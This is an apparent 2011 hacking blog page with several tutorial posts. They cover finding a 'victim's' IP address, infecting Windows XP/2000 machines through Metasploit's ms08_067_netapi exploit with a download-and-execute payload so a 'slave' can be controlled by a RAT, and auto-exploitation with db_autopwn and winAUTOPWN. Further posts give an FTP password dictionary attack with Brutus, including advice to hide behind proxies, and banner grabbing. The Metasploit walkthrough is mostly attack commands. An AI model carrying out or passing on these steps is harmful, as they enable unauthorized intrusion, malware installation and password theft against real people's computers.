Showing posts with label IP Address. Show all posts
Showing posts with label IP Address. Show all posts

Thursday, 17 November 2011

GET SOMEONE’S IP ADDRESS – 3 BEST METHODS

Obtaining an IP from MSN Messenger.

Firstly we learn the method used by most people when they want to get someone elses IP Address.


Step 1 – Start MSN Messenger and login as yourself.

Step 2 – Hit your “Start” button and click run. Type into the white box “Command” (without the quotation marks)


Step 3 – Type in “Netstat -N” (without the quotation marks) into the black box and hit enter.

Step 4 – Start a conversation with your ‘victim’ and send them a file. Once they accept the file Hit your “Start” button and click run. Type into the white box “Command” (without the quotation marks) and Type in “Netstat -N” (without the quotation marks) into the black box and hit enter.

Step 5 – Look in the middle column of both your MS Dos boxes and look in the newer wndow for the IP address that has magically appeared in the middle column. This is your victim’s IP Address.


Obtaining an IP from an E-Mail.


Ok, lets say the person does not use MSN Messenger (can’t blame them) we can get an IP address from most E-Mail address. In this example we shall use Outlook Express to view the E-Mails in.

Step 1 – Load Outlok express and left click on an E-Mail that was sent from your ‘victim’


Step 2 – Right click this E-Mail and click the “Properties” button.

Step 3 – Now Click on the tab displaying as it’s text “Details” and look for the buttom saying “Message Source”, once found (not hard) click it.

Step 4 – Look in all the jargon for something like “X-Originating-IP: “ with a number after the colon. This number is the sender’s IP Address.

Step 5 – If you cannot find “X-Originating-IP: ” then do not worry. Look for instead “Received:”, and go along this string untill you come to a nuber in brackets, this however maybe an IP but it might not be the IP address of the ‘victim’, infact if they sent the E-Mail from a we E-Mail service (like hotmail.com) then chances are it is not their IP address.
Obtaiing an IP from Physical Access.

If you have physical access to a computer then getting the IP address is simple.


Step 1 – Click the “Start” button and hit “Run”. Type in “Command” and hit enter.

Step 2 – Type in “ipconfig” OR “winipcfg” and hit enter now look for where it says “IP Address:”, next to this is the IP of the computer you are using…
Posted by at 02:13 0 comments
Labels: , ,

HOW TO HACK A COMPUTER USING NMAP & METASPLOIT – INFECTING THROUGH IP ADDRESS

Requirements:


Nmap
Metasploit

First of all you need target ip of your slave.

Then open Metasploit Console & type db_create.
[Use: This’ll create or connect you to database.]

Once you do that type Nmap.
[Use: This’ll load Nmap in Metasploit Console]
Next you need to type db_nmap -sT -sV

[This’ll scan OS, Ports, and Services running on slave’s computer.]

Wait for 5 min’s to complete its scan.
Once done, Note down the OS, Ports, and Services running on slave’s computer.

Now it’s time to exploit slave’s machine.

Exploit depends on the OS, Ports, and Services running on slave’s computer.

So, you’re lucky if you get OS WIN XP or 2000 because it’s easy to exploit them.

No matter weather they’re protected by any firewall or not.

Now I’ll tell you exploiting:-

Windows 2000 (all versions SP1, SP2, SP3, SP4)
Windows XP (all versions SP1, SP2, SP3)

Type show exploits
[Use: This’ll show all the exploits in its database.]

Next you need to type use windows/smb/ms08_067_netapi
[Use: This’ll select the exploit windows/smb/ms08_067_netapi]

Now Type show targets
[Use: This’ll show all targets by exploit]

Now Type set target 0

[Use: This’ll set target to 0 specified]

Then type show payloads

[Use: This’ll bring up all the payloads]

Next type set payload windows/download_exec

[Use: This’ll set payload as windows/download_exec]

Then Type show options

[Use: This’ll show all options in the exploit & payload]

In window you’ll see many options, in which you need to
Fill only two options RHOST & URL.

Type set RHOST
[Use: This’ll set RHOST (slave’s ip) to xxx.xxx.xxx.xxx]

Next Type set URL [content suppressed]
[Use: This’ll set URL to your direct server link.]

At last you need to type exploit
[Use: This will launch your exploit & your slave will be infected.]

You can now control you’re slave with RAT.

So, any versions of Win 2000-XP can be exploited easily.

In case if you didn’t get this two OS’, immediately after Nmap scan

You can use the command db_autopwn –p –t –e.
In most cases you get a shell.

Good Luck!
Posted by at 00:33 1 comments
Labels: , , ,

WINAUTOPWN – VERSION 2.4 – DOWNLOAD

This is to announce release of winAUTOPWN version 2.4…


winAUTOPWN is an auto (hacking) shell gaining tool. It can also be used to test IDS, IPS and other Monitoring sensors/softwares…

Download from here
Posted by at 00:32 1 comments
Labels: , , , ,

WHAT ARE DICTIONARY ATTACKS

You must first know what an FTP server is. FTP stands for File Transfer Protocol. FTP is a simple way to exchange files over the internet. If a hacker got FTP access to my website, he could delete/upload anything he wants on my server. An FTP address looks similar to a website address except it uses the prefix ftp:// instead of http://. I set up an FTP server on my computer so I could demonstrate. You can get Brutus at here.

1. First the hacker would choose a target. In this case it’s my home computer and the IP address for your home computer is 127.0.0.1 .

2. By going to ftp://127.0.0.1 I get a pop-up box asking for a username and password.


3. Next the hacker would launch a program similar to Brutus and attempt to crack the password.
4. In the target you put the IP address of the website and to the right select the appropriate option, which in this case is FTP.


5. The default port is 21 but some websites change this to make them a little more secure. If you find out that the port isn’t 21, you can find the right one by doing a port scan. We will get into this later in the book.
6. If you don’t know any of the usernames for the FTP server, then you will have to get a list of the most common usernames.

 7. For a dictionary attack you will have to choose the pass mode Word List and browse and select the file containing your word list. You can get some good password lists at http://packetstormsecurity.org/Crackers/wordlists/

8. Once you hit Start the program will attempt to connect to the server and begin to try all the possible combinations from your lists.


9. If you’re lucky, eventually it’ll get the right Username:Password combination.


10. A smarter hacker would use a proxy when using a program like this. What a proxy does is cloaks your IP address by sending your connection request through another computer before going to the target. This is a smart idea because as you will see in the image below, Brutus leaves a huge log of your presence on the target server.


11. In place of the IP address 127.0.0.1 would be the hackers IP address. Footprints like these get a hacker caught and into a lot of trouble with the law.
Posted by at 00:31 0 comments
Labels: , , , ,

BANNER GRABBING

Now that the hacker has a full list of services running on the target system, to be able to exploit them, he has to first figure out what software and version the service is. One way the hacker can get this information, is to telnet into service port. In the example below, we will use command prompt on Windows (Start -> Run -> Type “cmd” -> Enter). If you are on a Mac, you will be using the terminal. Note: If you are using Windows Vista, then telnet is not installed by default. You can install it by doing the following simple steps.

o Click Start then select Control Panel.
o Select Programs and Features.
o Select Turn Windows features on or off.
o Select the Telnet Client option and click OK.
o A box will appear to confirm installation. The telnet command should now be installed


1. First, the hacker would choose one of the open ports that were revealed in the Nmap scan to continue with and attempt to exploit. Let’s say that when the hacker scanned his target, he found the port 21 open. As you can see on the chart above, port 21 is FTP. To find out what FTP software is running he would use telnet by running the command:
telnet www.targetsite.com 21



I ran this against my computer (localhost). So a hacker would insert a target URL in place of localhost.

2. Next, it would connect to the target and display a banner telling the hacker the software and its version as shown below. This is the information the hacker needs to continue and begin searching for vulnerabilities for the software discovered.


If the above method doesn’t work for you, then simply use Nmap’s full version detection option to get the information.
Posted by at 00:24 0 comments
Labels: , , , ,
Subscribe to: Posts (Atom)